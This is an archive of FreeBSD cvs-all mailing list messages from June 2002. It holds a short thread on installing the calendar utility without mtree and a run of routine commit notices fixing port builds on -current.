From owner-cvs-all Sun Jun 16 0:28:45 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id A089A37B400; Sun, 16 Jun 2002 00:28:34 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5G7SXY26481; Sun, 16 Jun 2002 01:28:33 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5G7SWG61105; Sun, 16 Jun 2002 01:28:32 -0600 (MDT) (envelope-from imp@village.org) Date: Sun, 16 Jun 2002 01:27:29 -0600 (MDT) Message-Id: <20020616.012729.70214483.imp@village.org> To: grog@FreeBSD.org Cc: phantom@ark.cris.net, bde@zeta.org.au, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/calendar Makefile From: "M. Warner Losh" In-Reply-To: <20020615231946.GA65995@wantadilla.lemis.com> References: <200206132122.g5DLM0x90794@freefall.freebsd.org> <20020614121629.A26139@ark.cris.net> <20020615231946.GA65995@wantadilla.lemis.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message: <20020615231946.GA65995@wantadilla.lemis.com> "Greg 'groggy' Lehey" writes: : Possibly I'm missing some vital information here, but how does mtree : get invoked from the individual Makefile? It should be possible to : do: : : cd /usr/src/usr.bin/calendar : make all install : : This didn't work, because the French calendar entries had been added : since the last 'make world'. It doesn't seem reasonable for 'make : install' in this directory to behave differently from 'make : installworld' in /usr/src. mtree is done as part of installworld. Doing the above has never been supported in FreeBSD. While you might want individual makefiles to create the directories, none of the others in the system do that. It isn't part of the build system. Also, the install creates the directories with the wrong permissions and ownership if you don't use mtree. In short, make install is only supported after the mtree of installworld has happend :-) Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 0:32:10 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id 1018F37B41A; Sun, 16 Jun 2002 00:32:06 -0700 (PDT) Date: Sun, 16 Jun 2002 00:32:06 -0700 From: Juli Mallett To: "M. Warner Losh" Cc: grog@FreeBSD.org, phantom@ark.cris.net, bde@zeta.org.au, cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/usr.bin/calendar Makefile Message-ID: <20020616003205.A40830@FreeBSD.ORG> References: <200206132122.g5DLM0x90794@freefall.freebsd.org> <20020614121629.A26139@ark.cris.net> <20020615231946.GA65995@wantadilla.lemis.com> <20020616.012729.70214483.imp@village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020616.012729.70214483.imp@village.org>; from imp@village.org on Sun, Jun 16, 2002 at 01:27:29AM -0600 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * "M. Warner Losh" escriurères > > In short, make install is only supported after the mtree of > installworld has happend :-) > Do we have a target to just redo the mtree stuff? If so, it'd prolly be easier to point users to using that, in addition. Mind you, mixing and matching a not-100% system is nasty business. -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 0:37:29 2002 Delivered-To: cvs-all@freebsd.org Received: from rover.village.org (rover.bsdimp.com [204.144.255.66]) by hub.freebsd.org (Postfix) with ESMTP id 0DBA037B40E; Sun, 16 Jun 2002 00:37:24 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.3/8.11.3) with ESMTP id g5G7bMY26552; Sun, 16 Jun 2002 01:37:22 -0600 (MDT) (envelope-from imp@village.org) Received: from localhost (warner@rover2.village.org [10.0.0.1]) by harmony.village.org (8.11.6/8.11.6) with ESMTP id g5G7bKG61156; Sun, 16 Jun 2002 01:37:20 -0600 (MDT) (envelope-from imp@village.org) Date: Sun, 16 Jun 2002 01:36:17 -0600 (MDT) Message-Id: <20020616.013617.101655762.imp@village.org> To: jmallett@FreeBSD.ORG Cc: grog@FreeBSD.ORG, phantom@ark.cris.net, bde@zeta.org.au, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/calendar Makefile From: "M. Warner Losh" In-Reply-To: <20020616003205.A40830@FreeBSD.ORG> References: <20020615231946.GA65995@wantadilla.lemis.com> <20020616.012729.70214483.imp@village.org> <20020616003205.A40830@FreeBSD.ORG> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG In message: <20020616003205.A40830@FreeBSD.ORG> Juli Mallett writes: : * "M. Warner Losh" escriur=C3=A8res : > = : > In short, make install is only supported after the mtree of : > installworld has happend :-) : > = : = : Do we have a target to just redo the mtree stuff? If so, it'd prolly= be : easier to point users to using that, in addition. cd src/etc make distrib-dirs is as close as we get, as near as I can tell. It isn't perfect, but I think would work most of the time. : Mind you, mixing and matching a not-100% system is nasty business. Yup. Generally speaking, building individual programs isn't supported unless you are doing it on a system that was build from the sources you are doing it with. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 0:42:35 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id 3A7E737B41F; Sun, 16 Jun 2002 00:42:31 -0700 (PDT) Date: Sun, 16 Jun 2002 00:42:31 -0700 From: Juli Mallett To: "M. Warner Losh" Cc: grog@FreeBSD.ORG, phantom@ark.cris.net, bde@zeta.org.au, cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/usr.bin/calendar Makefile Message-ID: <20020616004230.A41927@FreeBSD.ORG> References: <20020615231946.GA65995@wantadilla.lemis.com> <20020616.012729.70214483.imp@village.org> <20020616003205.A40830@FreeBSD.ORG> <20020616.013617.101655762.imp@village.org> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020616.013617.101655762.imp@village.org>; from imp@village.org on Sun, Jun 16, 2002 at 01:36:17AM -0600 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG * "M. Warner Losh" escriurères > In message: <20020616003205.A40830@FreeBSD.ORG> > Juli Mallett writes: > : * "M. Warner Losh" escriurères > : > > : > In short, make install is only supported after the mtree of > : > installworld has happend :-) > : > > : > : Do we have a target to just redo the mtree stuff? If so, it'd prolly be > : easier to point users to using that, in addition. > > cd src/etc > make distrib-dirs > > is as close as we get, as near as I can tell. It isn't perfect, but I > think would work most of the time. Indeed. Forgot about that. Thanks. > : Mind you, mixing and matching a not-100% system is nasty business. > > Yup. Generally speaking, building individual programs isn't supported > unless you are doing it on a system that was build from the sources > you are doing it with. And of course, no existing dirs means no clean installworld means the program is not even supported in the userland that person has installed. -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 1:29:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4051337B41D; Sun, 16 Jun 2002 01:29:35 -0700 (PDT) Received: (from mdodd@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G8TZd93421; Sun, 16 Jun 2002 01:29:35 -0700 (PDT) (envelope-from mdodd) Message-Id: <200206160829.g5G8TZd93421@freefall.freebsd.org> From: "Matthew N. Dodd" Date: Sun, 16 Jun 2002 01:29:35 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/include histedit.h src/lib/libedit el.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG mdodd 2002/06/16 01:29:35 PDT Modified files: include histedit.h lib/libedit el.c Log: Restore local bits lost in recent merge from NetBSD. Revision Changes Path 1.8 +6 -0 src/include/histedit.h 1.11 +24 -19 src/lib/libedit/el.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 1:44:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5406037B407; Sun, 16 Jun 2002 01:44:39 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G8idG95132; Sun, 16 Jun 2002 01:44:39 -0700 (PDT) (envelope-from tjr) Message-Id: <200206160844.g5G8idG95132@freefall.freebsd.org> From: "Tim J. Robbins" Date: Sun, 16 Jun 2002 01:44:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/sed main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/16 01:44:39 PDT Modified files: usr.bin/sed main.c Log: Correct the handling of (for example) the N command by only zeroing the input space in mf_fgets() if we reach the end of all input files. Revision Changes Path 1.24 +2 -1 src/usr.bin/sed/main.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 1:58:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EBE7E37B40B; Sun, 16 Jun 2002 01:58:07 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G8w7I96088; Sun, 16 Jun 2002 01:58:07 -0700 (PDT) (envelope-from kris) Message-Id: <200206160858.g5G8w7I96088@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 01:58:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/shells/44bsd-csh/files patch-proc.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 01:58:07 PDT Added files: shells/44bsd-csh/files patch-proc.c Log: Fix build on -current. Submitted by: mike Revision Changes Path 1.1 +50 -0 ports/shells/44bsd-csh/files/patch-proc.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2: 0:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E6CE537B404; Sun, 16 Jun 2002 02:00:41 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G90fx96508; Sun, 16 Jun 2002 02:00:41 -0700 (PDT) (envelope-from kris) Message-Id: <200206160900.g5G90fx96508@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:00:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/fep/files patch-fep_main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:00:41 PDT Added files: misc/fep/files patch-fep_main.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +11 -0 ports/misc/fep/files/patch-fep_main.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2: 1:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1359D37B410; Sun, 16 Jun 2002 02:01:14 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G91Ea96796; Sun, 16 Jun 2002 02:01:14 -0700 (PDT) (envelope-from kris) Message-Id: <200206160901.g5G91Ea96796@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:01:14 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/lile/files patch-aa X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:01:13 PDT Modified files: misc/lile/files patch-aa Log: Fix build on -current. Submitted by: mike Revision Changes Path 1.3 +51 -7 ports/misc/lile/files/patch-aa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2: 2:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E316537B404; Sun, 16 Jun 2002 02:02:53 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G92rv96919; Sun, 16 Jun 2002 02:02:53 -0700 (PDT) (envelope-from kris) Message-Id: <200206160902.g5G92rv96919@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:02:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/mail/mailx/files patch-cmd2.c patch-fio.c patch-popen.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:02:53 PDT Added files: mail/mailx/files patch-cmd2.c patch-fio.c patch-popen.c Log: Fix build on -current. Submitted by: mike Revision Changes Path 1.1 +20 -0 ports/mail/mailx/files/patch-cmd2.c (new) 1.1 +20 -0 ports/mail/mailx/files/patch-fio.c (new) 1.1 +43 -0 ports/mail/mailx/files/patch-popen.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2: 3:56 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A286C37B40C; Sun, 16 Jun 2002 02:03:53 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G93rA97030; Sun, 16 Jun 2002 02:03:53 -0700 (PDT) (envelope-from kris) Message-Id: <200206160903.g5G93rA97030@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:03:53 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/ftp/ncftp/files patch-sys.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:03:53 PDT Added files: ftp/ncftp/files patch-sys.h Log: Fix build on -current. Submitted by: mike Revision Changes Path 1.1 +10 -0 ports/ftp/ncftp/files/patch-sys.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2: 7:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7398B37B400; Sun, 16 Jun 2002 02:07:49 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G97nd01379; Sun, 16 Jun 2002 02:07:49 -0700 (PDT) (envelope-from kris) Message-Id: <200206160907.g5G97nd01379@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:07:49 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news/nntp/files patch-netaux.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:07:49 PDT Added files: news/nntp/files patch-netaux.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +11 -0 ports/news/nntp/files/patch-netaux.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:10:16 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5638737B403; Sun, 16 Jun 2002 02:10:13 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9ADf01760; Sun, 16 Jun 2002 02:10:13 -0700 (PDT) (envelope-from kris) Message-Id: <200206160910.g5G9ADf01760@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:10:13 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/news/nntpbtr/files patch-nntpbtr.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:10:13 PDT Added files: news/nntpbtr/files patch-nntpbtr.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +11 -0 ports/news/nntpbtr/files/patch-nntpbtr.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:12:11 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9AD4937B401; Sun, 16 Jun 2002 02:12:06 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9C6Y02163; Sun, 16 Jun 2002 02:12:06 -0700 (PDT) (envelope-from kris) Message-Id: <200206160912.g5G9C6Y02163@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:12:06 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/devel/pmake/files patch-config.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:12:06 PDT Added files: devel/pmake/files patch-config.h Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +14 -0 ports/devel/pmake/files/patch-config.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:13:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D0DB237B405; Sun, 16 Jun 2002 02:13:29 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9DTu02322; Sun, 16 Jun 2002 02:13:29 -0700 (PDT) (envelope-from kris) Message-Id: <200206160913.g5G9DTu02322@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:13:29 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/rmsg/files patch-server.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:13:29 PDT Added files: net/rmsg/files patch-server.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +21 -0 ports/net/rmsg/files/patch-server.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:15: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CD50E37B401; Sun, 16 Jun 2002 02:15:02 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9F2w02453; Sun, 16 Jun 2002 02:15:02 -0700 (PDT) (envelope-from kris) Message-Id: <200206160915.g5G9F2w02453@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:15:02 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/tn3270/files patch-system.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:15:02 PDT Added files: net/tn3270/files patch-system.c Log: Fix build on current. Submitted by: bento Revision Changes Path 1.1 +15 -0 ports/net/tn3270/files/patch-system.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:16: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id C4E2537B405; Sun, 16 Jun 2002 02:16:00 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9G0q02552; Sun, 16 Jun 2002 02:16:00 -0700 (PDT) (envelope-from kris) Message-Id: <200206160916.g5G9G0q02552@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:16:00 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/misc/ttyrec/files patch-tyrec.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:16:00 PDT Added files: misc/ttyrec/files patch-tyrec.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +14 -0 ports/misc/ttyrec/files/patch-tyrec.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:17:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0BA5037B400; Sun, 16 Jun 2002 02:17:42 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9Hga02698; Sun, 16 Jun 2002 02:17:42 -0700 (PDT) (envelope-from kris) Message-Id: <200206160917.g5G9Hga02698@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:17:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/chinese/hztty/files patch-main.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:17:41 PDT Added files: chinese/hztty/files patch-main.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +20 -0 ports/chinese/hztty/files/patch-main.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:18: 4 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CC43637B40E; Sun, 16 Jun 2002 02:17:46 -0700 (PDT) Received: (from kuriyama@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9HkR02728; Sun, 16 Jun 2002 02:17:46 -0700 (PDT) (envelope-from kuriyama) Message-Id: <200206160917.g5G9HkR02728@freefall.freebsd.org> From: Jun Kuriyama Date: Sun, 16 Jun 2002 02:17:46 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/textproc/jade/files patch-config.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kuriyama 2002/06/16 02:17:46 PDT Added files: textproc/jade/files patch-config.h Log: Unbreak on -current. Submitted by: Alexander Kabaev PR: ports/39301 Revision Changes Path 1.1 +13 -0 ports/textproc/jade/files/patch-config.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:18:47 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7A2BC37B409; Sun, 16 Jun 2002 02:18:43 -0700 (PDT) Received: (from kris@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9IhO02923; Sun, 16 Jun 2002 02:18:43 -0700 (PDT) (envelope-from kris) Message-Id: <200206160918.g5G9IhO02923@freefall.freebsd.org> From: Kris Kennaway Date: Sun, 16 Jun 2002 02:18:43 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/cad/ngspice_rework/files patch-aspice.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG kris 2002/06/16 02:18:43 PDT Added files: cad/ngspice_rework/files patch-aspice.c Log: Fix build on current. Submitted by: mike Revision Changes Path 1.1 +11 -0 ports/cad/ngspice_rework/files/patch-aspice.c (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Sun Jun 16 2:42:34 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 175B937B409; Sun, 16 Jun 2002 02:42:31 -0700 (PDT) Received: (from demon@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5G9gV305327; Sun, 16 Jun 2002 02:42:31 -0700 (PDT) (envelope-from demon) Message-Id: <200206160942.g5G9gV305327@freefall.freebsd.org> From: Dmitry Sivachenko Date: Sun, 16 Jun 2002 02:42:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/gnomba Makefile distinfo pkg-descr pkg-plist ports/net/gnomba/files patch-ab patch-samba-Makefile patch-samba-include-config.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: 